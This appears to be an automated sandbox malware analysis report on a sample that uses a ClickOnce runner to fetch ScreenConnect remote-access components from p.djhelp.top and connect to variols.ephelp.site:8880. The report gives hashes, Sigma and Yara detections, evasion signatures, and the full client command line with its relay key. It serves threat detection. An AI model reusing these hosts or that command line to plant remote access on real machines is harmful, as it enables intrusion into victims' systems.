Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe

Overview

General Information

Sample name: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
Analysis ID: 1638406
MD5: f575dfa1a624610b143b2a699be652bf
SHA1: 4190ab427f3b77782569ac92f22bce1395cdc13e
SHA256: 38cb2c4523fa8863671c8895686fecaa57649876ac9f17dc98edc07f0ff2ee84
Tags: ConnectWise, exe, user-SecuriteInfoCom

Detection

ScreenConnect Tool
Score: 51
Range: 0 - 100
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe (PID: 6820 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe" MD5: F575DFA1A624610B143B2A699BE652BF)
    • dfsvc.exe (PID: 6956 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 7040 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000004.00000002.1496898405.000000000270A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.2709412544.000002728031A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 6956 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6472 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
4.0.ScreenConnect.WindowsClient.exe.350000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.8, DestinationIsIpv6: false, DestinationPort: 49683, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6956, Protocol: tcp, SourceIp: 172.67.152.68, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe, ParentProcessId: 7040, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 1304, ProcessId: 5640, ProcessName: WerFault.exe
                  No Suricata rule has matched

                  AV Detection

                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe | Virustotal: Detection: 17%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe | ReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe | Code function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 172.67.152.68:443 -> 192.168.2.8:49683 version: TLS 1.2
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
                  Source: Binary string: (}C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@ `5M source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.00000000007FC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @(o.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdbJ source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb8 source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdbnt( source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.ClientService.pdb8 source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280238000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280610000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000000.1105925658.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: o0C:\Windows\mscorlib.pdb[!x source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb;?*b source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdbl source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ?(oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: oXC:\Windows\ScreenConnect.ClientService.pdbx source: ScreenConnect.ClientService.exe, 00000005.00000002.1443855463.0000000000558000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2709412544.00000272807CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280234000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728060C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445175509.0000000004B22000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280614000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbd8m source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00764B9B FindFirstFileExA,0_2_00764B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\
                  Source: global trafficTCP traffic: 192.168.2.8:49710 -> 95.214.234.11:8880
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i= HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: p.djhelp.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 172.67.152.68 172.67.152.68
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: p.djhelp.top
                  Source: global trafficDNS traffic detected: DNS query: variols.ephelp.site
                  Source: dfsvc.exe, 00000001.00000002.2709412544.0000027280250000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe, 00000000.00000002.1577318421.000000000161B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA
                  Source: unknown HTTPS traffic detected: 172.67.152.68:443 -> 192.168.2.8:49683 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
